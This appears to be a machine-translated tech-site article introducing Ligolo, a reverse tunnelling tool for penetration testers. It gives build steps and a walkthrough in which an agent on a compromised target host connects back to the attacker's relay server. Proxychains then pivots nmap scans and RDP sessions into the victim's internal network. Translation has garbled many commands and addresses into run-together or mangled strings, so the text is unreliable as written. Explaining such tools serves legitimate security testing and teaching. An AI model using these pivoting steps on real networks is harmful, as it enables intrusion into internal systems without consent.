Shulou(Shulou.com)05/31 Report--

This article will explain what Ligolo is for you in detail. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Ligolo

Ligolo is a reverse tunneling tool designed for penetration testers. In fact, it is a lightweight tool that is very easy to implement and use, and can help penetration test researchers easily establish a fully secure SOCKS5 or TCP communication tunnel through a reverse connection.

Compared with Meterpreter and Autoroute + Socks4a, Ligolo runs faster and more stable.

Function introduction

1. TLS 1.3tunnel with TLS binding

2. Multi-platform support, including Windows, Linux and macOS.

3. Multiplexing (1 TCP connection can be multiplexed)

4. SOCKS5 agent or relay

Working with scen

Suppose you have successfully hacked a Windows/Linux/macOS server during an external security audit mission. This server is located in the local area network of the target organization, and you want to establish communication connections with other hosts in that network.

At this point, Ligolo can help you achieve this goal. It can give us a communication to follow and access the resources of the target internal server. four

Tool demonstration

Use Proxychains (WAN) to relay RDP communication connections.

Tool performance

The picture below shows the performance of the tool between two 100MB/s hosts, but the actual situation depends on the target system and network configuration.

Tool installation and use installation / compilation

First of all, make sure that the Go environment / tools are installed on your system. Next, use the following command to get the remote Ligolo project and related dependent components:

Cd `go env GOPATH` / srcgit clone https://github.com/sysdream/ligolocd ligolomake dep

Generate a self-signed TLS certificate and store it in the certs directory of the project:

Make certs TLS_HOST=example.com

Of course, you can also use your own TLS certificate through the TLS_CERT option:

Make build-all TLS_CERT=certs/mycert.pem

Finally, the project code is built.

For all system architectures: make build-all for the current system architecture: make build tool options Localrelay options: Usage of localrelay:-certfile string The TLS server certificate (default "certs/server.crt")-keyfile string The TLS server key (default "certs/server.key")-localserver string The localserver address (your proxychains parameter) (default "127.0.0.1))-relayserver string The relayserver Listening address (the connect-back address) (default "0.0.0.0 default 5555") Ligolo option: Usage of ligolo:-autorestart Attempt to reconnect in case of an exception-relayserver string The relayserver (the connect-back address) (default "127.0.0.1 Ligolo 5555")-skipverify Skip TLS certificate pinning verification-targetserver string The destination server (a RDP client SSH server, etc.)-when not specified, Ligolo starts a socks5 proxy server tool u

Ligolo consists of the following two modules:

1 、 localrelay

2 、 ligolo

Localrelay needs to run on the server side controlled by the attacker, and Ligolo needs to run on the target host.

For localrelay, you can use the default option directly, which listens on all interfaces on port 5555 and waits for a connection from ligolo.

For ligolo, you must use the-relayserver ip:port parameter to specify the IP address of the relay server, that is, the IP address of the attacker's server.

You can use the-h option to view the tool's help commands.

After the connection between Localrelay and ligolo is established, the tool will set up a SOCKS5 proxy on TCP port 1080 of the relay server, and then you can use your favorite tool to infiltrate the target LAN network.

On the attacker's server side, run the following command:

. / bin/localrelay_linux_amd64

On the target host, run the following command:

> ligolo_windows_amd64.exe-relayserver LOCALRELAYSERVER:5555

Once the communication connection is established, set the following parameters (on the attacker's server side) in the configuration file of ProxyChains:

[ProxyList] # add proxy here... # meanwile# defaults set to "tor" socks5 127.0.0.1 1080

Finally:

$proxychains nmap-sT 10.0.0.0Compact 24-p 80-Pn-A $proxychains rdesktop 10.0.0.123 license Agreement

The development and release of the Ligolo project follows the GNU General Public License v3.0 open source license agreement.

This is the end of this article on "what is Ligolo?". I hope the above content can be helpful to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.